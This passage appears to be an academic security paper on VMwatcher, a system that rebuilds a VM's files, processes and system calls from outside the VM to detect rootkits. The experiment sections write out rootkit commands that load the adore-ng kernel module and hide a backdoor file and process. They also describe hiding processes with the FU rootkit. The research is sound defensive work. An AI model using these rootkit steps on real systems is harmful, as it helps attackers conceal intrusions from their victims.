# Stealthy Malware Detection and Monitoring through VMM-Based "Out-of-the-Box" Semantic View Reconstruction

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An alarming trend in recent malware incidents is that they are armed with stealthy techniques to detect, evade, and subvert malware detection facilities of the victim. On the defensive side, a fundamental limitation of traditional host-based antimalware systems is that they run inside the very hosts they are protecting ("in-the-box"), making them vulnerable to counter detection and subversion by malware. To address this limitation, recent solutions based on virtual machine (VM) technologies advocate placing the malware detection facilities outside of the protected VM ("out-of-the-box"). However, they gain tamper resistance at the cost of losing the internal semantic view of the host, which is enjoyed by "in-the-box" approaches. This poses a technical challenge known as the semantic gap.

In this article, we present the design, implementation, and evaluation of *VMwatcher*—an "outof-the-box" approach that overcomes the semantic gap challenge. A new technique called guest view casting is developed to reconstruct internal semantic views (e.g., files, processes, and kernel modules) of a VM nonintrusively from the outside. More specifically, the new technique casts semantic definitions of guest OS data structures and functions on virtual machine monitor (VMM)level VM states, so that the semantic view can be reconstructed. Furthermore, we extend guest view casting to reconstruct details of system call events (e.g., the process that makes the system

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call as well as the system call number, parameters, and return value) in the VM, enriching the semantic view. With the semantic gap effectively narrowed, we identify three unique malware detection and monitoring capabilities: (i) view comparison-based malware detection and its demonstration in rootkit detection; (ii) "out-of-the-box" deployment of off-the-shelf anti malware software with improved detection accuracy and tamper-resistance; and (iii) nonintrusive system call monitoring for malware and intrusion behavior observation. We have implemented a proof-of-concept VMwatcher prototype on a number of VMM platforms. Our evaluation experiments with real-world malware, including elusive kernel-level rootkits, demonstrate VMwatcher's practicality and effectiveness.

Categories and Subject Descriptors: D.4.6 [**Operating System**]: Security and protection—*Invasive software*; K.6.5 [**Management of Computing and Information Systems**]: Security and protection

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## 1. INTRODUCTION

Internet malware (e.g., rootkits, worms, and bots) is getting increasingly stealthy and elusive: They try to hide their presence from detection facilities and even detect and subvert any existing anti malware software in the compromised system. For example, a detailed analysis of an Agobot variant [Agobot 2004] has revealed that the malware contains malicious logic to detect and remove more than 105 antivirus processes in the victim machine.

The threat described earlier in the text is partly attributed to a fundamental limitation on the defensive side: Most host-based antimalware systems are installed and executed inside the very hosts that they are monitoring and protecting (Figure 1(a)). Although such "in-the-box" deployment provides an antimalware system with a native, semantic-rich view of the host, it in the meantime makes the antimalware system visible, tangible, and potentially subvertable to advanced malware residing in the host.

To address this problem, there have recently been a number of solutions [Dunlap et al. 2002; Garfinkel and Rosenblum 2003; Joshi et al. 2005] that advocate placing the intrusion detection facilities outside of the (virtual) machine being monitored. Based on virtual machine technologies [Barham et al. 2003; Dike 2002], such an "out-of-the-box" approach significantly improves the tamper resistance of intrusion detection facilities. A virtual machine (VM) achieves strong isolation and confines processes running inside the VM such that, even if they are compromised by malware, it will be hard, if not impossible, to compromise systems outside of the VM.

However, a dilemma exists in switching from the in-the-box approach to the out-of-the-box approach: It is well known that there exists a "semantic gap" [Chen and Noble 2001] between the view of the VM from the outside and the view from the inside—the latter being seen by the traditional, in-the-box



Fig. 1. Malware detection in traditional "in-the-box" approach and in VMwatcher approach.

antimalware systems. For example, instead of seeing semantic-level objects, such as processes, files, and kernel modules, we only see memory pages, registers, and disk blocks from outside the VM, making out-of-the-box malware detection difficult. In other words, the out-of-the-box approach gains tamper resistance at the cost of losing the internal semantic view of the host enjoyed by the in-the-box approaches.

The previously described dilemma motivates us to explore the possibility of gaining the advantages of both camps, namely enabling tamper-resistant malware detection without losing the semantic view. In this article, we present the design, implementation, and evaluation of VM watcher-a VMM-based, outof-the-box approach that overcomes the semantic gap challenge. More specifically, VMwatcher instantiates the general virtual machine introspection (VMI) [Garfinkel and Rosenblum 2003] methodology in a nonintrusive manner, so that it can inspect the low-level VM states and events without perturbing the VM's execution. A new technique called *guest view casting* is developed to systematically reconstruct the VM's internal semantic view (e.g., files, directories, processes, and kernel-level modules) for out-of-the-box malware detection. Furthermore, we extend guest view casting to reconstruct details of system call events in the VM (e.g., the calling process as well as the system call number, parameters, and return value). The new technique is based on the key observation that the guest OS of a VM provides all necessary semantic definitions of guess OS data structures, functions, and system calls to construct the VM's semantic view. As such, we can cast these definitions on the VMMlevel observations and externally derive the semantic view of the target VM (Figure 1(b)).

VMwatcher enables new malware detection and monitoring capabilities that are previously difficult or impossible to achieve. In this article, we identify and demonstrate three such capabilities: (i) view comparison-based stealthy malware detection, which involves comparing a VM's semantic views obtained from both inside and outside for possible discrepancy detection; (ii) out-of-the-box execution of unmodified, off-the-shelf antimalware software with improved detection accuracy. This is an extreme test to VMwatcher's semantic gap-narrowing technique and, interestingly, it further enables cross-platform malware scanning where antimalware software developed for one platform can be readily used for another platform; (iii) nonintrusive system call monitoring in a production or honeypot VM, which elevates the tamper resistance of malware behavior observation and experimentation.

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We have implemented a VMwatcher prototype on a number of VMM platforms and evaluated it with a collection of real-world malware instances (e.g., kernel and user level rootkits). Experiments with these elusive rootkits demonstrate VMwatcher's unique capability of view comparison-based malware detection. The VMwatcher prototype also supports out-of-the-box deployment of a variety of off-the-shelf antimalware software such as Symantec AntiVirus and Microsoft Windows Defender.

The rest of this article is organized as follows: Section 2 presents the design of VMwatcher, followed by the implementation details in Section 3. We present evaluation results in Section 4 and discuss possible limitations in Section 5. Section 6 discusses related work, and Section 7 concludes this article.

## 2. VMWATCHER OVERVIEW

## 2.1 Design Goals and Assumption

Figure 1 illustrates the key difference between the traditional in-the-box approach and the VM watcher approach for malware detection. VM watcher achieves stronger tamper resistance by moving malware monitoring facilities out of the VM being monitored. VM watcher is based on two key enabling techniques: (i) nonintrusive VM introspection for the procurement of low-level (VMM-level) VM states and system call events, without deploying any facility inside the VM (Section 2.2.1) and (ii) guest view casting for external reconstruction of VM internal semantic view (Section 2.2.2). VM watcher has the following three design goals:

- First, VMwatcher should not perturb the system state of the target VM. This will prevent VMwatcher from affecting the normal execution of the VM and causing adverse side effects (e.g., system inconsistency [Joshi et al. 2005]) in the VM. This goal is realized by our technique for nonintrusive inspection and analysis of low-level VM observations. Nonintrusiveness also makes it hard for internal malicious processes to infer (external) VMwatcher activities.
- —Second, VMwatcher should significantly narrow the semantic gap such that the same malware detection system that runs inside the VM can also run outside of the VM. As to be shown, this goal is critical to the new malware detection capabilities. The goal is realized by our guest view casting technique for external reconstruction of VM semantic view. Based on the reconstructed view, antimalware systems can perform file or memory scanning operations as if they were inside the VM.<sup>1</sup>
- —Third, VMwatcher should be generic and applicable to a number of existing VMMs. Currently there exist two mainstream virtualization approaches: full virtualization and paravirtualization. Full virtualization (as in VMware [VMware 2008] and QEMU [Bellard 2005]) transparently supports legacy OSs without modifying the guest OS code; while paravirtualization (as in

<sup>&</sup>lt;sup>1</sup>We need to point out that some hooking-based features of antimalware systems are hard to support by VM introspection. Certain high-level events (e.g., Windows API calls or hooks), which are of interest to some antivirus software, may not be captured from low-level VMM observations.

Xen [Barham et al. 2003] and User-Mode Linux [Dike 2002]) is less transparent as it needs to modify the guest OS source code. VMwatcher aims at supporting VMMs in both categories.

We also note that different VMMs choose to implement VMs at different levels, imposing varying complexity on VMwatcher. More specifically, the lower the virtualization level, the wider the semantic gap it will create and, consequently, the greater the challenge for VMwatcher to bridge the semantic gap. For example, because of its system call level virtualization, user-mode linux (UML) preserves much of the semantic information (e.g., processes) and thus leads to a much narrower semantic gap than VMware, Xen, and QEMU.

—Assumption on trusted VMM In this article, we assume a trusted VMM that achieves VM isolation: A malware instance may compromise arbitrary entity and facility inside the VM—including the guest OS kernel itself. However, it cannot break out of the VM and corrupt the underlying VMM. This assumption is based on the observation that the code base of a VMM is much smaller and more stable than the legacy OS code. Furthermore, the VMM provides a more limited interface (which can be further hardened and validated) to untrusted VMs in the form of virtualized underlying physical resources. We note that this assumption is consistent with that of many other VM-based security research efforts [Dunlap et al. 2002; Garfinkel et al. 2003; Garfinkel and Rosenblum 2003; Joshi et al. 2005; Koju et al. 2005]. We will discuss possible attacks (e.g., VM fingerprinting) in Section 5.

## 2.2 Enabling Techniques

2.2.1 Nonintrusive Virtual Machine Introspection. VMwatcher follows the VM introspection methodology to capture low-level VM states and events externally. For open-source VMMs such as Xen, QEMU, and UML, we develop VM introspection extensions to obtain full VM state, which includes the VM's registers, memory, and disk and to capture system calls made by processes in the VM. To achieve nonintrusiveness, we follow the principle of passive, read-only observation without inflicting any influence on the VM—this is important, as such an influence would lead to undesirable consequences such as inconsistency in the VM's system state or perturbation in the VM's execution.

For close-source VMMs, we only have limited access to VMM-level observations. For example, with Microsoft Virtual PC, we are not able to read VM registers (e.g., the control register CR3) or monitor virtual interrupts. Without a VMM's source code, VMwatcher has to rely on whatever low-level VM state abstraction exposed by the VMM. Details of our nonintrusive VM introspection technique will be presented in Section 3.1.

2.2.2 *Guest View Casting.* Given the VMM-level observations of a running VM, our second technique, guest view casting, will externally reconstruct the internal semantic view of the VM. We observe that the guest OS data structure definitions (e.g., files and directories) and function semantics (e.g., semantics of file system drivers) can be used as "templates" to interpret low-level VM states. As such, we can cast the guest data structure and function definitions on the

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VMM-level VM observations to derive the VM's semantic view. For example, given a "live" virtual disk of a running VM, the guest functions, such as guest device drivers and related file system drivers, allow us to reconstruct semantic information such as files and directories from the "raw" bits and bytes on the virtual disk. Similarly, by casting guest memory data structures (e.g., process control blocks) and functions to the physical memory pages allocated to a VM by the VMM, we can identify each individual running process with its attributes, such as process id and name, and derive semantic information about each loaded kernel module inside the VM.

Guest view casting further performs high-fidelity restoration of semantic objects, so that the restored objects can be presented to an antimalware system in exactly the same way as inside the VM. For example, Tripwire [Kim and Spafford 1994] assumes a standard UNIX-like file system layout and calculates the checksums of files and directories to identify possible changes; McAfee VirusScan examines file directories and attempts to spot any existing malware in these directories. As such, guest view casting needs to further "package" the objects (e.g., files and directories) in the reconstructed semantic view and seamlessly present these objects to the antimalware system in their native, manipulable form.

2.2.3 Guest System Call Reconstruction. Guest view casting reconstructs a VM's semantic state. For malware monitoring and detection, it is also desirable to capture and interpret the system call events that occur inside the VM. To this end, we extend the guest view casting technique to enable guest system call reconstruction. More specifically, processes (including the malicious ones) inside the VM make system calls by executing system call instructions (e.g., sysenter/sysexit). Such an instruction will be captured by the VMM. Our VM introspection technique will then be invoked to further acquire low-level context information relevant to the system call (e.g., register values and memory contents). This context information will be interpreted by our extended guest view casting technique, using system call semantics as the casting "templates." Guest system call reconstruction generates detailed system call information, including the process making the system call and the system call number, parameters, and return value. The reconstruction of guest system calls is performed in real time and from outside the VM, which improves the tamper resistance of existing system call-based monitoring and detection systems.

## 2.3 New Malware Detection and Monitoring Capabilities

VMwatcher enables a number of useful malware detection and monitoring capabilities. The first capability is view comparison-based detection of elusive malware. We have seen an increasing number of elusive malware instances that hide themselves (including the related files and processes) by subverting antimalware processes running inside the system. For view comparison, we corroborate an internal view (generated from inside the VM) with an external view (generated from outside the VM by VMwatcher) of the same objects of interest and detect the existence of hidden malware based on any view discrepancy exhibited. We note that view comparison can be performed either on the full

semantic views of a VM, or on more focused, customized views (e.g., a list of files/processes satisfying a certain condition) generated by a malware detection function. As an example, running the *ls* command inside a Linux VM can provide an internal view of those files under the current directory. With VMwatcher, we can run the same *ls* command outside of the VM and obtain an external view of the files under the same directory. Any difference between the two *ls* results will immediately lead to the detection of hidden files.

View comparison is not limited to a VM's persistent states, such as disk files. It can also be performed on the VM's volatile states such as running processes, loaded kernel modules, or even current statistics of a NIC device. We find this capability highly valuable, especially when detecting advanced kernellevel rootkits that hide running processes or kernel modules (Section 4.1). We point out that view comparison would be infeasible without VMwatcher: If separated by a semantic gap, the internal and external views of a VM would not be directly comparable.

The second capability is out-of-the-box execution of off-the-shelf antimalware systems, which improves the detection accuracy as well as tamper resistance of these systems. Moreover, since the guest OS of a VM may be different from the host OS, it is possible to perform cross-platform malware detection, where antimalware software developed for one platform (e.g., Windows) can be readily used for another platform (e.g., Linux). We will present one such experiment in Section 4.2.

The third capability is nonintrusive system call monitoring for malware behavior observation. With VMwatcher's guest system call reconstruction technique, it is possible to monitor system calls made by any process inside a VM, without installing any logging module in the VM or modifying the guest OS. This capability has direct applications in a number of scenarios, such as system call-based anomaly detection [Provos 2003], forensic analysis [King and Chen 2003], and malware experimentation [Jiang and Xu 2004; Jiang et al. 2005].

## 3. IMPLEMENTATION

We have implemented a proof-of-concept VMwatcher prototype on top of four existing VMMs: VMware, QEMU, Xen, and UML.<sup>2</sup> The prototype is able to reconstruct semantic views of a variety of VMs, including Windows 2000/XP, Red Hat Linux 7.2/8.0/9.0, and Fedora Core 1/2/3/4. In the following, we describe VMwatcher implementation in detail.

## 3.1 VMM-Level State and Event Procurement

As mentioned in Section 2.1, VMwatcher is designed to be generically applicable to various VMMs. Table I lists the VMM-level VM state and event observation offered by the four VMMs. The open-source VMMs—QEMU, Xen, and UML allow full access to low-level VM states and events. The close-source VMware typically exposes only the raw disk blocks and raw memory pages allocated to a

<sup>&</sup>lt;sup>2</sup>In our current prototype, guest system call reconstruction is supported by VMware and QEMU because of their convenient system call instruction interception.

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	Full virtu	alization	Paravirtualization	
VMM-level observation	VMware	QEMU	Xen	UML
Raw VM disk image	$\checkmark$	$\checkmark$	$\checkmark$	$\checkmark$
Raw VM memory image	$\checkmark$	$\checkmark$	$\checkmark$	$\checkmark$
Other VM hardware states (e.g., registers)	$\checkmark$	$\checkmark$	$\checkmark$	$\checkmark$
VM-related low-level events (e.g., interrupts)	$\checkmark$	$\checkmark$	$\checkmark$	$\checkmark$

Table I. VMM-Level Observation of VM States and Events

VM. We recently obtained the source code of VMware Workstation 6.0 through the VMware Academic Program. As a result, our current VMwatcher prototype is able to access full VM states and events.

For the procurement of the VM's raw disk and memory states, we need to access a VM's raw disk and memory while they are being modified. To ensure state consistency, a VMM usually grants exclusive access (e.g., with a write lock) to virtualized resources (e.g., memory or disk) to a VM. As a result, it could prevent any external process from accessing them. More specifically, the file lock in Windows imposed by VMware is mandatory, which means that any external process such as VMwatcher is not able to read the locked file. There are two possible solutions: One is to follow the same approach taken by current system back-up software, which utilizes the volume shadow copy service (more details in [Microsoft 2003]) of Windows to access the locked files. In other words, we can create a shadow copy of the locked file and instruct VMwatcher to access the shadow copy for VM state procurement. The other approach is to develop a device driver that essentially subverts the host Windows kernel and allows VM watcher to read the locked file directly through the device driver. Our prototype takes the first approach, which follows the nonintrusive principle, as it will not modify the locked file. On UNIX platforms, the file lock is advisory by default, which means that we can ignore the lock and just read the locked file.

The previously described strategy resolves the "read-write" conflict between running VMs and VMwatcher when both are simultaneously accessing the same disk file in the host domain. Note that for a running VM, a file emulating its virtual disk means a root file system or a hard disk partition; while for VM watcher, it is considered the externally observable VM disk state. We also note that VMware, QEMU with KQEMU [Bellard 2006] support, and UML generate a temporary memory file to emulate the allocated raw physical memory for a VM, which allows for external simultaneous access by VMwatcher. However, Xen and QEMU without KQEMU support do not create such memory file. As such, we need to extend them to export a VM's physical memory pages. In our prototype, VMwatcher takes advantage of the *libxc* library [Xen 2004] to access the memory of a Xen-based VM (or DomU) by mapping its physical memory to its address space with the *xc\_map\_foreign\_range()* API and then reading the content through the mapped memory. Similarly, we build our own library for QEMU, which essentially allows for external VM watcher access to the allocated physical memory pages for a QEMU-based VM.

For the capture of a VM's low-level events, we first leverage a VMM's capability of intercepting system call instructions. Such capability is readily available

in a number of VMMs, such as VMware and QEMU. Upon the capture of a system call instruction, VMwatcher will be invoked to collect relevant low-level context information about this system call, such as the values of registers (CR3, ESP, EAX, etc.) and certain memory contents in the virtual address space of the process that makes the system call. In particular, the procurement of the memory contents is guided by certain register values, which supply the virtual addresses of the corresponding memory contents. With the low-level register and memory states, we extend the guest view casting technique by casting system call semantics to the low-level context information. The extended technique will reconstruct detailed semantic information about the system call event (Section 3.2.3).

## 3.2 Semantic View Reconstruction

Based on raw VM disk and memory states, VMwatcher uses the guest view casting technique to extract high-level semantic information (e.g., files and processes) and then present them seamlessly to antimalware software. In the following, we describe our casting methods for disk and memory state reconstruction and for guest system call reconstruction.

3.2.1 Disk State Reconstruction. It is straightforward to reconstruct the semantic view from the raw virtual disk blocks of a VM if we understand how files and directories are organized in the virtual disk. Particularly, our method casts the corresponding device drivers and file system drivers of the guest OS for disk semantic view reconstruction. For Linux, the casting is convenient as the device drivers and file system drivers are likely part of the open-source Linux kernel. However, this is not the case for Windows. The reason is that the Windows kernel does not have the corresponding file system drivers for the Linux root file systems. For the VMwatcher prototype, we have written Windows device drivers to interpret Linux file systems (*ext2/ext3* root file systems).

3.2.2 *Memory State Reconstruction*. It is a more challenging task to reconstruct the semantic view of the volatile VM memory. The challenge is that it requires accurate casting of guest memory data structures and functions to understand how the physical memory pages are utilized. Note that the casted guest memory data structures and functions are specific to a VM kernel.

For ease of presentation, we focus our discussion on Linux for the current 32-bit architecture (which implies an addressable memory range [0, 4G-1]). In Linux, the 4G memory space of a process is split between user space (the bottom 3GB memory) and kernel space (the top 1GB memory), and the Linux kernel is mapped into every user-level process starting at virtual address 0xC0000000. Based on the physical memory layout, the first Linux kernel page (with virtual address 0xC0000000) is located in the first physical memory page (with physical address 0x00000000). This provides the starting point for our guest view casting method: If we can access the memory file containing the raw memory of a running VM, offset 0 in the memory file will correspond to the current memory address 0xC0000000 inside the VM. Next, we utilize the exported symbol

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Fig. 2. Guest view casting for volatile VM memory state (Linux).

information<sup>3</sup> and apply guest view casting to identify and reconstruct guest data structures of interest. Figure 2 shows how guest view casting is applied to reconstruct the volatile kernel memory state of a Linux VM. More specifically, every process in Linux is represented by a process control block (defined as *task\_struct*), and all running processes are linked by a doubly linked list. The head of this list is kept in a structure called *init\_task\_union*, which is exported and can be identified by querying the *System.map* file. Following this pointer, we can further parse the raw memory image and traverse the doubly linked list to reconstruct detailed semantic information about each running process (e.g., its page table and memory layout in the *mm\_struct* data structure).

From the same memory image, we can also cast and reconstruct a number of other important kernel data structures (e.g., the system call table, the interrupt descriptor table, and the kernel module list) and identify the areas that contain core kernel instructions or instructions in the loadable kernel modules. It is worth mentioning that a user-level memory address (<3G) is usually a virtual memory address of a process running in the VM. Since VMwatcher is running outside of the VM, it needs to translate the virtual memory address into the corresponding physical memory address, which can then be used to access the VMM-level memory state.

We note that existing hardware has the capability of automating the traversal of page table for address translation. However, it implicitly assumes that the

<sup>&</sup>lt;sup>3</sup>For some commercial OSs, the locations of these symbols may not be provided. VMwatcher will perform a full scan of the raw memory and identify the symbols by looking for certain "signatures" [bugcheck 2006] that are unique to kernel-level data structures of interest. For example, we use 0x03001b0000000000 to identify potential process instances in the Windows XP raw memory file.

virtual address being translated belongs to the current process whose page table base is in CR3. For the virtual address of an arbitrary process, VMwatcher will have to externally identify and walk through the page table of that process to obtain the corresponding physical address and read its content. The code for this operation is shown in the following text in function *vmwatcher\_vir\_mem\_read32*, where *addr* is the virtual address to be accessed; *task* points to the process control block (assuming the *task\_struct* data structure in Figure 2) of the process of interest; *pde* and *pte* refer to a page directory entry and a page table entry associated with the process, respectively; and *vmwatcher\_phy\_mem\_read32* reads the memory content at the physical address from the VMM-level memory state procured by VMwatcher.

unsigned int vmwatcher\_vir\_mem\_read32(task, addr) {
 /\* Step 1: obtain the page directory entry \*/
 pde\_addr = task->mm->pgd + (addr >>20) &~3;
 pde = vmwatcher\_phy\_mem\_read32(pde\_addr);
 /\* Step 2: obtain the page table entry \*/
 if ( !(pde & PG\_PRESENT) ) return -1;
 pte\_addr = pde&~Oxfff + (addr >> 10) & Oxffc;
 pte = vmwatcher\_phy\_mem\_read32(pte\_addr);

```
/* Step 3: obtain the physical address */
if ( !(pte & PG_PRESENT) ) return -1;
phy_addr = pte&~Oxfff + addr&Oxfff;
return vmwatcher_phy_mem_read32(phy_addr);
```

```
}
```

Although the earlier description is in the context of Linux, guest view casting reflects a generic, systematic methodology that can be applied to various VMM platforms and OSs. During the prototype implementation, we have evaluated how different OSs, service patches, and system configurations impact the casting of VM states and events. For example, OSs may have different memory layout (e.g., Windows has a 2G/2G memory split between user and kernel spaces), affecting the external location of important kernel data structures and symbols. Moreover, different versions of the same OS may have subtle variations for the same kernel-level data structure (e.g., Linux 2.4.20 and 2.6.15-1 have different definitions for *task\_struct*). Configuration variation over the same OS (e.g., PAE or swap partition support in modern OSs, such as Windows and Linux) adds additional complexity to VM semantic view reconstruction. All such variations should be reflected in the VMwatcher implementation. However, the guest view casting methodology remains effective despite these variations, as confirmed by our evaluation results in Section 4.

3.2.3 *Guest System Call Reconstruction*. With the low-level system call context information (Section 3.1), guest system call reconstruction will derive the detailed semantic information about the system call. The reconstruction

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leverages the guest view casting technique but uses system call semantics as the casting template. In the following description, we assume Linux as the guest OS.

To identify the process that makes the system call, we follow the ESP register value, captured by VMwatcher upon the execution of the system call instruction, to the location of OS data structure *task\_struct*. More specifically, we follow the same procedure extensively used in the Linux kernel to identify the current process (i.e., *current* = ESP&(8192-1)). The Linux kernel consolidates two kernel data structures—the kernel stack and the process control block *task\_struct*—for the current process in two consecutive pages (8,192 bytes). After locating the content of *task\_struct*, the information about the current process can be derived by guest view casting using the definition of *task\_struct*.

To reconstruct the parameters of the system call, we use the system call convention to interpret the low-level system call context information obtained by VMwatcher: The system call number can be obtained directly from the value of register EAX, while the first six system call arguments are carried by registers EBX, ECX, EDX, ESI, EDI, and EBP. However, the register values alone may not reveal the true semantics of the corresponding arguments—the registers may contain memory addresses pointing to the "true" semantic information (e.g., a file name, an array of command line arguments, or an array of environment settings). To derive the semantic information, we need to follow the register values and locate the corresponding memory contents. The need for such register-guided memory state procurement also arises in another situation: If the system call involves more than six arguments, they will all be pushed to the stack and register EBX will point to the starting address in the stack. In this case, we need to follow EBX to obtain the arguments in the stack.

We note that the previously described register-guided memory state procurement involves accessing the virtual address space of the process making the system call and hence is more complicated than accessing the OS kernel data structures. Fortunately, the memory state reconstruction technique in Section 3.2.2 can be readily applied to perform this task: First, the page table of the current process can be located by following the value of register CR3. For each register that carries a pointer (virtual address) argument of the system call, page table look-up will be performed to map the virtual address to the physical address. Finally, the corresponding memory content can be accessed by the physical address. The astute reader may notice that these steps are performed exactly by VMwatcher routine *vmwatcher\_vir\_mem\_read32* shown in Section 3.2.2.

To reconstruct the return value of the system call, VMwatcher keeps track of the system call and captures its completion, on which the return value will be obtained by a procedure similar to the one described earlier in the text for system call argument reconstruction. More specifically, the completion of the system call is indicated by the execution of the instruction right after the system call instruction in the same process. As such, VMwatcher maintains at least the following book-keeping information about each system call: (i) semantic information that has been reconstructed upon the start of the system call (i.e., id of the calling process, as well as system call number and parameters), (ii) the

base address of the calling process' page table, and (iii) the (virtual) address of the instruction right after the system call instruction. This way, the completion of a system call can be captured and unambiguously matched with the start of the same system call—despite the possibility of context switches during system call handling.

In the current VMwatcher prototype, guest system call reconstruction has been implemented in both VMware and QEMU VMM platforms, indicating the generality of the guest view casting technique. Our prototype supports realtime capture and reconstruction of 260 Linux system calls.

## 4. EVALUATION

We evaluate the VMwatcher prototype to demonstrate the three new malware detection and monitoring capabilities (Section 2.3) enabled by VMwatcher. In particular, we show: (i) how VM view comparison effectively detects one of the most stealthy types of malware—rootkits (Section 4.1); (ii) how VMwatcher enables out-of-the-box deployment of legacy anti malware systems (Section 4.2); and (iii) how VMwatcher supports nonintrusive system call monitoring for malware/attack behavior observation (Section 4.3). Finally, we present performance measurement results (Section 4.4).

#### 4.1 View Comparison-Based Malware Detection

View comparison-based malware detection exploits the very nature of rootkits hiding attack processes and related files. We have experimented with more than 10 Windows rootkits as well as a dozen Linux rootkits and the view comparison capability are able to detect all the rootkits tested and pinpoint the hidden processes and/or files. Due to space constraints, we only present three representative experiments in detail.

*Experiment I—view comparison on volatile VM states.* The first experiment involves a Windows kernel-level FU rootkit [FU 2005]. Figure 3 shows the screenshot of an infected system where the FU rootkit runs and hides a process with PID 336. The system is based on VMware, while the host OS is Scientific Linux 4.4 and the guest OS is Windows XP with SP2. In the figure, the background GUI screen with the Windows command shell window shows the inside of the VM, while the foreground screen (encapsulated with a dashed box) on the left shows the VMwatcher-generated external view of the running processes in the same VM.

From the figure, we can observe that a Window command shell (PID: 1080) is created, and it is used to invoke the FU rootkit to hide process 336. This hidden process is a running SSH client program—SSH Secure File Transfer (version 3.2.9). This screenshot also shows a short help message on how to invoke the FU rootkit, as well as current Windows Task Manager output. The Windows Task Manager does not list the SSH client process, indicating that this (running) process has been successfully hidden.

In comparison, the hidden process is exposed by the external view generated by VMwatcher: The small box with solid lines inside the foreground screen highlights the *SshClient.exe* process, which is not shown by the (internal) output

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Fig. 3. A VMware-based Windows XP VM infected by the FU rootkit.

of Windows Task Manager. Although we manually conduct this rootkit attack, VMwatcher can be readily adopted by real-world honeypots to detect in-thewild rootkit attacks. In fact, recent incidents [Rbot 2006] show that the same FU rootkit has been actively used to hide the presence of advanced stealthy bots.

Experiment II—view comparison on persistent VM states. In this experiment, we prepare a VMware-based Windows XP VM that contains the files of two rootkits, Hacker Defender (or hxdef) [HackDefender 2004] and NTRootkit [NTRootkit 2005], in the  $c:\$  demo directory. Both rootkits, when running, are able to hide selected attack files and processes. For evaluation purposes, we only run the hxdef rootkit in the VM. After activating hxdef, we run the Symantec AntiVirus software inside the VM; the scanning result is shown in Figure 4(a). The result indicates that the internal view successfully identifies NTRootkit but it *misses* hxdef, because the latter has hidden any file, directory, or process with the string *hxdef* in its name.

Meanwhile, we run the same version of Symantec AntiVirus outside of the VM in the host OS and the scanning is based on the VM's semantic view reconstructed by VMwatcher. The result is shown in Figure 4(b). Different from the internal result, the external result catches both NTRootkit and hxdef. The difference is highlighted by the dashed box in Figure 4(b). More importantly, by comparing the two views, we can infer that hxdef, not NTRootkit, is the one that is currently running.

*Experiment III—view comparison on both volatile and persistent VM states.* We describe our experiment with the *adore-ng* [Adoreng 2004] rootkit—an advanced Linux kernel rootkit that will directly replace certain kernel-level function pointers to hide files and processes.

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(a) Result of running Symantec AntiVirus inside the VM. (b) Result of running Symantec AntiVirus outside the VM.

Fig. 4. Comparison of internal and external views of a hxdef-infected VM.



Fig. 5. A Xen-based Fedora Core 4 VM infected by the adore-ng rootkit.

Figure 5 is a screenshot showing an *adore-ng* rootkit that infects a Xenbased Fedora Core 4 VM. There are four numbered *xterm* windows in the figure. The *xterm* window with the number 0 on the right shows the inside of the VM, where the *adore-ng* kernel-level module (LKM) is first loaded (*insmod/lib/modules/2.6.16-xenU/misc/adore-ng-2.6.ko*). A user-level program called *ava* is used to control the LKM's functionality. Then, a backdoor daemon is executed (*/root/demo/backdoor*). After that, *adore-ng* is instructed to conceal the existences of any local files named backdoor (*ava h backdoor*)

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and the backdoor daemon with PID 1490 (*ava i 1490*). As revealed in the same xterm window, the outputs of commands ls and ps are already manipulated to conceal the existence of any file with the name backdoor and any process with PID 1490.

The external view of the VM is shown on the left side of Figure 5. In particular, *xterm* window 2 lists the files under the directory */root/demo/* in the VM; while *xterm* window 3 enumerates current running processes inside the VM. From *xterm* window 2, the internally-concealed backdoor file is *visible* to VMwatcher. Similarly, *xterm* window 3 highlights the internally hidden backdoor process with PID 1490. This experiment further demonstrates that the semantic view reconstructed by VMwatcher cannot be manipulated by the rootkit running inside the VM. As such, view comparison effectively exposes the rootkit's existence (even if the exposed file and process have unsuspected names).

## 4.2 Out-of-the-Box Deployment of Legacy Antimalware Software

VMwatcher also supports out-of-the-box deployment and execution of a number of off-the-shelf antimalware systems and naturally enables the new capability of cross-platform malware detection. We have successfully experimented with 11 real-world antivirus software systems shown in Table II. For each antivirus system, Table II also summarizes the corresponding evaluation environment, that is, the VMM, the host OS, and the guest OS.

In the following, we describe an experiment that deploys the Symantec AntiVirus software (Windows version) out of the box to detect malware instances inside a Linux honeypot VM.

Experiment IV-cross-platform malware detection. The Linux honeypot is a VMware-based Red Hat 7.2 VM that contains a number of remotely exploitable vulnerabilities. We run Symantec AntiVirus (version 10.1.0.396) in the Windows host domain to detect possible infections inside the honeypot. Figure 6 shows two screenshots of the same Symantec AntiVirus software (version 10.1.0.396): one before its scanning and one after the scanning. More specifically, Figure 6(a) shows that the corresponding virtual disk of the honeypot VM is externally interpreted and transparently represented as a local "Z:" drive, while Figure 6(b) reports 21 infected files in the VM. Among the infected files, there is a rootkit named SHv4 [Miller 2003], which replaces a number of system-wide utility commands (e.g., ps, ls, ifconfig, netstat, and syslogd) with its own. We also notice that there is a Lion worm [Lion 2001] infection in the report (highlighted in the dashed box of Figure 6(b)), which we believe is misclassified. The two Lion-infected files identified are tksb and tkp under directory *lib/ldd.so*. It turns out that *tksb* is a shell script that functions as a log cleaner, while *tkp* is a Perl script essentially looking for user names and passwords in collected network traffic. Later forensic analysis reveals that an attacker first exploited the Apache web server vulnerability [Apache 2003] to gain system access. After that, he exploited the local ptrace kernel vulnerability [Securia 2003] to escalate his privilege to system root before installing the SHv4 rootkit.

Software	VMM	Guest OS	Host OS
Symantec	VMware	Windows XP (SP2)	Windows
AntiVirus	Server 1.0.1	Red Hat 7.2, 8.0, 9.0	XP(SP2)
10.1.0396	build-29996	FC1, 2, 3, 4, RHEL4	
Windows Defender	VMware	Windows XP (SP2)	Windows
(1.1.1592.0)	Server 1.0.1		XP(SP2)
Malicious Software	build-29996	Red Hat 7.2, 8.0, 9.0	
Removal Tool 1.2		FC1, 2, 3, 4, RHEL4	
Trend Micro	Xen 3.0.2-2	Red Hat FC4	Scientific
ServerProtect	VMware	Windows XP (SP2)	Linux 4.4
for Linux 2.5	Server 1.0.1	Red Hat 7.2, 8.0, 9.0	
	build-29996	FC1, 2, 3, 4, RHEL4	
Kaspersky	Xen 3.0.2-2	Red Hat FC4	Scientific
Anti-Virus 5.5	VMware	Windows XP (SP2)	Linux 4.4
(trial version)	Server 1.0.1	Red Hat 7.2, 8.0, 9.0	
	build-29996	FC1, 2, 3, 4, RHEL4	
F-Secure	Xen 3.0.2-2	Red Hat FC4	Scientific
Anti-Virus 5.20	VMware	Windows XP (SP2)	Linux 4.4
Build 5050	Server 1.0.1	Red Hat 7.2, 8.0, 9.0	
